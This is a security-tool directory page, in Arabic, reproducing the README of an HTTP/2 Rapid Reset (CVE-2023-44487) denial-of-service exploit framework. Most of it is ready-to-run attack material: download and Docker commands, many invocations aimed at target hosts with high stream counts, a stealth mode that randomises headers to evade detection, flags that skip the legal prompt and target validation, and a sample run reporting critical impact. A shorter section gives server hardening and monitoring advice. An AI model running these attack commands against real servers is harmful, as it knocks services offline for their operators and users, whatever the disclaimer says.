Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالفريق الأحمرالهجوم العدائي
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

إطار عمل متقدم لاستغلال ثغرة CVE-2023-44487 الخاصة بـ HTTP/2 Rapid Reset. يتضمن هجمات متزامنة متعددة الاتصالات، وتحكمًا تكيفيًا في المعدل، ووضع التخفي مع رؤوس عشوائية، ومقاييس في الوقت الفعلي، وتقارير تقييم المخاطر. مخصص لاختبار الاختراق المصرح به فقط. بواسطة Sudeepa Wanigarathna

عرض المستودع
14منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2023-44487 لرفض الخدمة HTTP/2 عبر إعادة الضبط السريع

الإصدار الاحترافي v1.0.1 | المؤلف: Sudeepa Wanigarathna

Python Version License Version CVSS


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الميزات
  • المتطلبات
  • التثبيت
  • بدء سريع
  • دليل الاستخدام
  • خيارات الإعداد
  • دعم Docker
  • أمثلة
  • فهم النتائج
التوصيات الأمنية
  • إخلاء المسؤولية القانوني
  • المؤلف
  • سجل التغييرات

  • نظرة عامة

    إطار تقييم بمستوى احترافي لثغرة CVE-2023-44487، وهي ثغرة إعادة الضبط السريع في HTTP/2. تساعد هذه الأداة المتخصصين في الأمن السيبراني على اختبار الأنظمة والتحقق منها ضد أحد أكثر حالات رفض الخدمة HTTP/2 تأثيرًا التي تم الكشف عنها في السنوات الأخيرة.

    توضح الأداة كيف يمكن للإنشاء السريع وإعادة الضبط لتدفقات HTTP/2 أن يستنزف موارد الخادم ويؤدي إلى حالات رفض الخدمة (DoS).

    أبرز الميزات في لمحة

    • محرك هجوم متعدد الاتصالات — اتصالات HTTP/2 متزامنة
    • تحكم تكيفي في المعدل — ضبط ديناميكي لتحقيق أقصى فعالية
    • وضع التخفي — ترويسات عشوائية وتدوير الاتصالات
    • تقارير شاملة — JSON/CSV مع تقييم المخاطر
    • دعم Docker — نشر عبر الحاويات
    • مراقبة فورية — مقاييس الهجوم والتقدم بشكل مباشر
    • تسجيل احترافي — مخرجات وحدة تحكم ملونة مع تسجيل في ملف
    الاستخدامالنتائج

    تفاصيل الثغرة

    CVE-2023-44487: هجوم إعادة الضبط السريع HTTP/2

    السمةالقيمة
    معرّف CVECVE-2023-44487
    درجة CVSS7.5 (مرتفع)
    متجه الهجومالشبكة
    تعقيد الهجوممنخفض
    التأثيررفض الخدمة (استنزاف الموارد)
    البروتوكولات المتأثرةHTTP/2
    تاريخ الإفصاحأكتوبر 2023

    نظرة تقنية عامة

    تستغل الثغرة آلية إدارة التدفقات في بروتوكول HTTP/2:

    1. إنشاء التدفق — يرسل العميل إطار HEADERS لإنشاء تدفق جديد
    2. إعادة ضبط فورية — يرسل العميل فورًا إطار RST_STREAM
    3. معالجة الخادم — يجب على الخادم معالجة كلا الإطارين، مما يستهلك الموارد
    4. استنزاف الموارد — الدورات المتكررة تُرهق موارد الخادم

    التأثير

    • استنزاف الموارد على خوادم HTTP/2
    • رفض خدمة محتمل (DoS)
    • يمكن أن يؤثر على موازنات التحميل والخوادم الوسيطة وشبكات توصيل المحتوى (CDN)
    • لا يتطلب مصادقة أو صلاحيات خاصة

    الميزات

    الميزات الأساسية

    الميزةالوصف
    دعم HTTP/2تنفيذ كامل لبروتوكول HTTP/2 باستخدام مكتبة h2
    اتصالات متعددةهجوم متزامن عبر اتصالات متعددة
    SSL/TLSدعم HTTPS مع خيارات التحقق من الشهادات
    تحكم تكيفي في المعدليضبط معدل الهجوم ديناميكيًا بناءً على استجابة الخادم
    وضع التخفيترويسات عشوائية وتدوير الاتصالات
    مراقبة فوريةعرض المقاييس مباشرة أثناء التشغيل
    تقارير شاملةمخرجات JSON/CSV مع تقييم المخاطر
    دعم Dockerنشر عبر الحاويات لسهولة الاختبار

    إمكانيات متقدمة

    • دعم البروكسي — إعداد بروكسي قابل للتوسيع
    • تجميع الاتصالات — إدارة فعالة للاتصالات
    • استرداد الأخطاء — معالجة سلسة لفشل الاتصالات
    • ضبط الأداء — إعدادات قابلة للتخصيص لسيناريوهات مختلفة
    • التكامل مع CI/CD — مناسب لاختبارات الأمان الآلية

    المتطلبات

    متطلبات النظام

    المكوّنالحد الأدنىالموصى به
    نظام التشغيلLinux / macOS / Windowsلينكس أو macOS
    Python3.7+3.11+
    المعالجنواتان4 أنوية أو أكثر
    الذاكرة2GB4GB+
    الشبكة100Mbps1Gbps+

    التبعيات

    root@kitploit:~
    h2>=4.1.0,<5.0.0
    aiohttp>=3.8.0,<4.0.0
    

    التثبيت

    1. التثبيت السريع

    root@kitploit:~
    # Clone the repository
    git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
    cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
    
    # Install dependencies
    pip install -r requirements.txt
    
    # Verify installation
    python3 cve-2023-44487-exploit.py --help
    

    2. البيئة الافتراضية (موصى بها)

    root@kitploit:~
    # Create virtual environment
    python3 -m venv venv
    
    # Activate virtual environment
    # On Linux/macOS:
    source venv/bin/activate
    # On Windows:
    venv\Scripts\activate
    
    # Install dependencies
    pip install -r requirements.txt
    

    3. التثبيت باستخدام Docker

    root@kitploit:~
    # Build Docker image
    docker build -t cve-2023-44487-exploit .
    
    # Run with Docker
    docker run --rm cve-2023-44487-exploit target.com
    

    4. التثبيت اليدوي

    root@kitploit:~
    # Install without requirements.txt
    pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"
    
    # Download the exploit
    wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py
    
    # Make executable
    chmod +x cve-2023-44487-exploit.py
    

    بدء سريع

    الاستخدام الأساسي

    root@kitploit:~
    # Simple run with default settings
    python3 cve-2023-44487-exploit.py example.com
    
    # Test HTTPS on port 443
    python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify
    
    # Test HTTP on port 80
    python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
    

    اختبار سريع (5 ثوانٍ)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
    

    تقييم كامل (60 ثانية)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify
    

    دليل الاستخدام

    خيارات سطر الأوامر

    إعداد الهدف

    الخيارالوصفالافتراضي
    hostاسم المضيف الهدف أو عنوان IPمطلوب
    -p, --portمنفذ الهدف443
    --no-sslتعطيل SSL/TLSFalse
    --no-verifyتخطي التحقق من SSLFalse

    إعداد الهجوم

    الخيارالوصفالافتراضي
    -c, --connectionsعدد الاتصالات المتزامنة50
    -s, --streamsالتدفقات لكل اتصال1000
    -d, --durationالمدة بالثواني30
    --max-streamsالحد الأقصى لإجمالي التدفقات100000
    --delayالتأخير الأساسي بين العمليات0.0001s

    خيارات متقدمة

    الخيارالوصفالافتراضي
    --adaptiveتحكم تكيفي في المعدلTrue
    --target-rpsالطلبات المستهدفة في الثانية10000
    --stealthوضع التخفي (ترويسات عشوائية)False
    --skip-validationتخطي التحقق من الهدفFalse
    --forceتخطي موجه إخلاء المسؤولية القانونيFalse

    التقارير

    الخيارالوصفالافتراضي
    -o, --outputاسم ملف الإخراجexploit_results.json
    --formatصيغة الإخراج (json / csv / console)json
    -v, --verboseتسجيل مفصّلFalse

    خيارات الإعداد

    استخدم خيارات سطر الأوامر أعلاه لضبط التزامن وحجم التدفقات والمدة والتقارير. يُفضَّل استخدام قيم أقل لـ -c / -s / -d في التحقق الأولي، ثم قم بزيادة الحجم فقط على الأنظمة المصرح لك باختبار ضغطها.

    السيناريوالخيارات المقترحة
    اختبار مبدئي سريع-c 10 -s 100 -d 5
    تقييم قياسي-c 50 -s 1000 -d 30
    اختبار معملي بحمل مرتفع-c 100 -s 2000 -d 60 --stealth
    شهادة غير موثوقة--no-verify
    HTTP عادي-p 80 --no-ssl

    دعم Docker

    بناء الصورة

    root@kitploit:~
    docker build -t cve-2023-44487-exploit .
    

    تشغيل تقييم أساسي

    root@kitploit:~
    docker run --rm cve-2023-44487-exploit target.com
    

    التشغيل بمعلمات مخصصة

    root@kitploit:~
    docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60
    

    حفظ النتائج محليًا

    root@kitploit:~
    docker run --rm -v "$(pwd)/results:/app/results" \
      cve-2023-44487-exploit target.com -o /app/results/report.json
    

    الوضع التفاعلي

    root@kitploit:~
    docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit
    

    Docker Compose

    root@kitploit:~
    # Start with docker-compose
    docker-compose up
    
    # Run with a custom command
    docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60
    

    أمثلة

    1. تقييم HTTPS أساسي

    root@kitploit:~
    python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30
    

    2. تقييم HTTP (بدون SSL)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30
    

    3. تشغيل معملي عالي الأداء

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000
    

    4. وضع التخفي

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60
    

    5. اختبار تحقق سريع

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
    

    6. إنشاء تقرير CSV

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv
    

    7. تخطي التحقق

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30
    

    8. اختبار إنتاجي مصرح به

    root@kitploit:~
    python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
      -c 100 -s 2000 -d 60 --stealth -o full_report.json
    

    فهم النتائج

    مقاييس المخرجات

    المقياسالوصفالتفسير
    إجمالي التدفقاتعدد التدفقات التي تم إنشاؤهاعدد أعلى = حمل أكبر تم توليده
    عمليات إعادة الضبط الناجحةالتدفقات التي تمت إعادة ضبطها بنجاحعادة >90% على الأهداف الضعيفة
    معدل إعادة الضبط (RPS)عمليات إعادة الضبط في الثانيةمعدل أعلى = حمل أكثر فعالية
    معدل النجاحالنسبة المئوية لعمليات إعادة الضبط الناجحةغالبًا ما تشير نسبة >90% إلى قابلية الإصابة
    أخطاء الاتصالالاتصالات الفاشلةمنخفض = اتصال مستقر
    عمليات إعادة الضبط من الخادمعمليات إعادة ضبط بدأها الخادممرتفع = وجود إجراءات حماية

    مستويات تقييم المخاطر

    المستوىالدرجةالمعنى
    حرج80–100الخادم شديد الضعف
    مرتفع60–79الخادم عرضة للخطر، مع وجود بعض الحماية
    متوسط40–59توجد بعض الحماية
    منخفض0–39خادم محمي جيدًا

    نموذج الإخراج

    root@kitploit:~
    ================================================================================
    EXPLOIT EXECUTION SUMMARY
    ================================================================================
    Target: target.com:443
    Duration: 30.00s
    Total Streams: 15,234
    Successful Resets: 15,198
    Reset Rate: 506.6/s
    Success Rate: 99.76%
    Connection Errors: 0
    --------------------------------------------------------------------------------
    RISK ASSESSMENT
    --------------------------------------------------------------------------------
    Risk Level: CRITICAL
    Risk Score: 95/100
    Factors:
      - Extremely high reset rate accepted
      - Very high success rate
    ================================================================================
    

    التوصيات الأمنية

    لمسؤولي الأنظمة

    إجراءات فورية

    1. تطبيق التصحيحات الأمنية

      • التحديث إلى أحدث تطبيقات HTTP/2
      • تطبيق التصحيحات الأمنية الخاصة بالمورّد
      • تحديث موازنات التحميل والخوادم الوسيطة
    2. تطبيق الحد من المعدل

      root@kitploit:~
      # Nginx rate limiting example
      http {
          limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
          limit_req zone=http2 burst=20 nodelay;
      }
      
    3. حدود الاتصالات

      root@kitploit:~
      # Limit connections per client
      limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
      limit_conn conn_zone 10;
      

    تحصين الإعدادات

    الإعدادالتوصية
    الحد الأقصى للتدفقات المتزامنةاضبطه على 100–200 لكل اتصال
    معدل إعادة ضبط التدفقاتالحد إلى <100/ثانية لكل عميل
    حد الاتصالاتبحد أقصى 50–100 اتصال لكل عنوان IP
    قيم المهلةقلل مهلات الخمول
    حدود حجم الطلباتحدد أحجام الترويسات والحمولة

    المراقبة

    root@kitploit:~
    # Monitor HTTP/2 connections
    netstat -an | grep 443 | grep ESTABLISHED | wc -l
    
    # Monitor reset-related log entries (example)
    grep "RST_STREAM" /var/log/nginx/error.log | wc -l
    

    إجراءات الأمان الموصى بها

    • الحد من المعدل — تنفيذ حدود تدفقات لكل عميل
    • خنق الاتصالات — الحد من الاتصالات لكل عنوان IP
    • حدود الموارد — ضبط قيم مهلة الاتصال
    • المراقبة — تفعيل التسجيل والتنبيهات للأنشطة غير الطبيعية
    • قواعد WAF — تنفيذ قواعد WAF خاصة بـ HTTP/2
    • إدارة التصحيحات — تحديثات أمنية منتظمة
    • الاستجابة للحوادث — امتلاك خطة لهجمات DoS

    إخلاء المسؤولية القانوني

    هام: اقرأ هذا بعناية قبل استخدام هذه الأداة

    هذه الأداة مقدمة لاختبارات الأمان المصرح بها والأغراض التعليمية فقط.

    شروط الاستخدام

    باستخدامك لهذه الأداة، فإنك تقر وتوافق على أن:

    1. لديك إذن كتابي صريح لاختبار النظام الهدف
    2. أنت تتفهم المخاطر والتأثير المحتمل لهذا التقييم
    3. ستمتثل لجميع القوانين واللوائح المعمول بها
    4. أنت تتحمل المسؤولية الكاملة عن أفعالك
    5. لن تستخدم هذه الأداة في أنشطة غير مصرح بها

    الاستخدامات المحظورة

    يجب عدم استخدام هذه الأداة في:

    • الاختبارات أو الهجمات غير المصرح بها
    • رفض الخدمة ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها
    • تعطيل أنظمة الإنتاج دون تصريح
    • التسبب في ضرر مالي
    • أي أنشطة غير قانونية

    بيان المسؤولية

    يقدم المؤلف والمساهمون هذه الأداة «كما هي» دون أي ضمان. استخدام هذه الأداة يكون على مسؤوليتك الخاصة. المؤلف غير مسؤول عن أي أضرار أو مشكلات قانونية ناتجة عن استخدام هذه الأداة.

    قد ينتهك الاستخدام غير المصرح به لهذه الأداة قوانين تشمل على سبيل المثال لا الحصر:

    • قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) — الولايات المتحدة
    • قانون إساءة استخدام الحاسوب — المملكة المتحدة
    • اللائحة العامة لحماية البيانات (GDPR) — الاتحاد الأوروبي
    • القوانين المحلية والوطنية والدولية الأخرى ذات الصلة

    المؤلف

    Sudeepa Wanigarathna

    • باحث أمني ومختبر اختراق
    • متخصص في أمن التطبيقات وثغرات البروتوكولات
    • GitHub
    • LinkedIn

    سجل التغييرات

    الإصدار 1.0.1 (الحالي)

    • إصلاح خطأ السمة connection_attempts
    • تحسين التحقق من SSL/ALPN
    • إضافة معالجة المهلات
    • تعزيز استرداد الأخطاء
    • إضافة علامة --skip-validation
    • تحسين دعم Docker

    الإصدار 1.0.0 (الأولي)

    • الإصدار الأولي للنسخة الاحترافية
    • محرك هجوم متعدد الاتصالات
    • تحكم تكيفي في المعدل
    • وضع التخفي
    • تقارير شاملة
    • دعم Docker

    الترخيص

    هذا المشروع مرخص بموجب رخصة MIT — راجع ملف LICENSE للحصول على التفاصيل.


    شكر وتقدير

    • فريق بروتوكول HTTP/2
    • الباحثون الأمنيون الذين اكتشفوا CVE-2023-44487
    • مجتمع المصادر المفتوحة (مشروعا h2 وaiohttp)

    المراجع

    • إدخال CVE-2023-44487 في NVD
    • تحليل هجوم إعادة الضبط السريع HTTP/2
    • مواصفات بروتوكول HTTP/2 (RFC 9113)
    • النشرة الأمنية لـ HTTP/2 في Nginx
    • دليل أمان HTTP/2 في Apache

    الدعم

    للمشكلات والأسئلة:

    • مشكلات GitHub: تقديم مشكلة
    • البريد الإلكتروني: [email protected]
    • جهة الاتصال الأمنية: إذا وجدت ثغرة في هذا المشروع، فيرجى الإبلاغ عنها بمسؤولية.

    بطاقة مرجعية سريعة

    root@kitploit:~
    # Quick Commands
    
    # Test HTTPS (skip cert verify)
    python3 cve-2023-44487-exploit.py target.com --no-verify
    
    # Test HTTP
    python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
    
    # Quick test (5 seconds)
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5
    
    # Full assessment
    python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth
    
    # Skip validation
    python3 cve-2023-44487-exploit.py target.com --skip-validation
    
    # Docker
    docker run --rm cve-2023-44487-exploit target.com
    
    # Help
    python3 cve-2023-44487-exploit.py --help
    

    تذكير: احصل دائمًا على التصريح المناسب قبل اختبار أي نظام. استخدم هذه الأداة بمسؤولية وأخلاقية.


    تتم الصيانة بواسطة Sudeepa Wanigarathna | آخر تحديث: أغسطس 2026

    تنزيل الأداة